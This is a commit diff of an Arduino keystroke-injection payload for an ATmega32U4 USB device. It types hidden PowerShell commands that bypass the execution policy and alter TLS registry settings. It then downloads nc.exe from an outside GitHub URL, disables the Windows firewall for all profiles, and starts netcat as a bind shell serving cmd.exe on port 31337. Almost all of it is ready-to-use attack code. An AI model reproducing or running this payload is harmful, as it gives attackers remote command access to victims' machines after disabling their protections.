1
1
/*
2
- Single File Encryption Payload for GENERIC USB ATMEGA32U4 hw
2
+ NC Reverse Shell Payload for GENERIC USB ATMEGA32U4 hw
3
3
Copyright (c) 2021, Paulo C. Marcon (Licensed under MIT)
4
4
For more information see: https://github.com/pcmarcon/malduino-payload-sample
5
5
*/
@@ -174,7 +174,7 @@ void setup() {
174
174
typeKey (KEY_RETURN);
175
175
176
176
delay (defaultDelay);
177
- Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile {New-Item 'HKLM:\\ SYSTEM\\ CurrentControlSet\\ Control\\ SecurityProviders\\ SCHANNEL\\ Protocols\\ TLS 1.3\\ Server' -Force}" );
177
+ Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-Item 'HKLM:\\ SYSTEM\\ CurrentControlSet\\ Control\\ SecurityProviders\\ SCHANNEL\\ Protocols\\ TLS 1.3\\ Server' -Force}" );
178
178
179
179
delay (defaultDelay);
180
180
delay (100 );
@@ -183,7 +183,7 @@ void setup() {
183
183
typeKey (KEY_RETURN);
184
184
185
185
delay (defaultDelay);
186
- Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile {New-ItemProperty -path 'HKLM:\\ SYSTEM\\ CurrentControlSet\\ Control\\ SecurityProviders\\ SCHANNEL\\ Protocols\\ TLS 1.3\\ Server' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force}" );
186
+ Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\\ SYSTEM\\ CurrentControlSet\\ Control\\ SecurityProviders\\ SCHANNEL\\ Protocols\\ TLS 1.3\\ Server' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force}" );
187
187
188
188
delay (defaultDelay);
189
189
delay (100 );
@@ -192,7 +192,7 @@ void setup() {
192
192
typeKey (KEY_RETURN);
193
193
194
194
delay (defaultDelay);
195
- Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile {New-ItemProperty -path 'HKLM:\\ SYSTEM\\ CurrentControlSet\\ Control\\ SecurityProviders\\ SCHANNEL\\ Protocols\\ TLS 1.3\\ Server' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force}" );
195
+ Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-ItemProperty -path 'HKLM:\\ SYSTEM\\ CurrentControlSet\\ Control\\ SecurityProviders\\ SCHANNEL\\ Protocols\\ TLS 1.3\\ Server' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force}" );
196
196
197
197
delay (defaultDelay);
198
198
delay (100 );
@@ -201,7 +201,7 @@ void setup() {
201
201
typeKey (KEY_RETURN);
202
202
203
203
delay (defaultDelay);
204
- Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile {New-Item 'HKLM:\\ SYSTEM\\ CurrentControlSet\\ Control\\ SecurityProviders\\ SCHANNEL\\ Protocols\\ TLS 1.3\\ Client' -Force}" );
204
+ Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {New-Item 'HKLM:\\ SYSTEM\\ CurrentControlSet\\ Control\\ SecurityProviders\\ SCHANNEL\\ Protocols\\ TLS 1.3\\ Client' -Force}" );
205
205
206
206
delay (defaultDelay);
207
207
delay (100 );
@@ -210,7 +210,7 @@ void setup() {
210
210
typeKey (KEY_RETURN);
211
211
212
212
delay (defaultDelay);
213
- Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile {New-ItemProperty -path ' HKLM: \\\\ SYSTEM \\\\ CurrentControlSet \\\\ Control \\\\ SecurityProviders \\\\ SCHANNEL \\\\ Protocols \\\\ TLS 1.3 \\\\ Client' -name 'Enabled' -value '0' -PropertyType 'DWord' -Force }" );
213
+ Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden {reg add HKLM\\ SOFTWARE \\ Microsoft \\ .NETFramework \\ v4.0.30319 /v SystemDefaultTlsVersions /t REG_DWORD /d 1 /f /reg:64 }" );
214
214
215
215
delay (defaultDelay);
216
216
delay (100 );
@@ -219,7 +219,7 @@ void setup() {
219
219
typeKey (KEY_RETURN);
220
220
221
221
delay (defaultDelay);
222
- Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile {New-ItemProperty -path 'HKLM: \\\\ SYSTEM \\\\ CurrentControlSet \\\\ Control \\\\ SecurityProviders \\\\ SCHANNEL \\\\ Protocols \\\\ TLS 1.3 \\\\ Client' -name 'DisabledByDefault' -value 1 -PropertyType 'DWord' -Force} " );
222
+ Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden \" (New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/pcmarcon/malduino-payload-samples/master/bin/nc.bin', 'nc.exe') \" " );
223
223
224
224
delay (defaultDelay);
225
225
delay (100 );
@@ -228,16 +228,10 @@ void setup() {
228
228
typeKey (KEY_RETURN);
229
229
230
230
delay (defaultDelay);
231
- Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile {reg add HKLM\\\\ SOFTWARE\\\\ Microsoft\\\\ .NETFramework\\\\ v4.0.30319 /v SystemDefaultTlsVersions /t REG_DWORD /d 1 /f /reg:64}" );
232
-
233
- delay (defaultDelay);
234
- delay (100 );
235
-
236
- delay (defaultDelay);
237
- typeKey (KEY_RETURN);
231
+ delay (2000 );
238
232
239
233
delay (defaultDelay);
240
- Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile \" (New-Object System.Net.WebClient).DownloadFile('https://raw.githubusercontent.com/pcmarcon/malduino-payload-samples/master/bin/nc.bin', 'nc.exe') \" " );
234
+ Keyboard.print (" netsh advfirewall set allprofiles state off " );
241
235
242
236
delay (defaultDelay);
243
237
delay (100 );
@@ -246,10 +240,7 @@ void setup() {
246
240
typeKey (KEY_RETURN);
247
241
248
242
delay (defaultDelay);
249
- delay (2000 );
250
-
251
- delay (defaultDelay);
252
- Keyboard.print (" netsh advfirewall set allprofiles state off" );
243
+ Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden \" %temp%\\ nc.exe -Lp 31337 -vv -e cmd.exe\" " );
253
244
254
245
delay (defaultDelay);
255
246
delay (100 );
@@ -258,14 +249,14 @@ void setup() {
258
249
typeKey (KEY_RETURN);
259
250
260
251
delay (defaultDelay);
261
- Keyboard.print (" powershell.exe -executionpolicy bypass -noprofile -windowstyle hidden \" %temp% \\ nc.exe -Lp 31337 -vv -e cmd.exe \" " );
252
+ Keyboard.print (" exit " );
262
253
263
254
delay (defaultDelay);
264
255
delay (100 );
265
256
266
257
delay (defaultDelay);
267
258
typeKey (KEY_RETURN);
268
-
259
+
269
260
/* ----- End-Payload -----*/
270
261
271
262
Keyboard.end ();
0 commit comments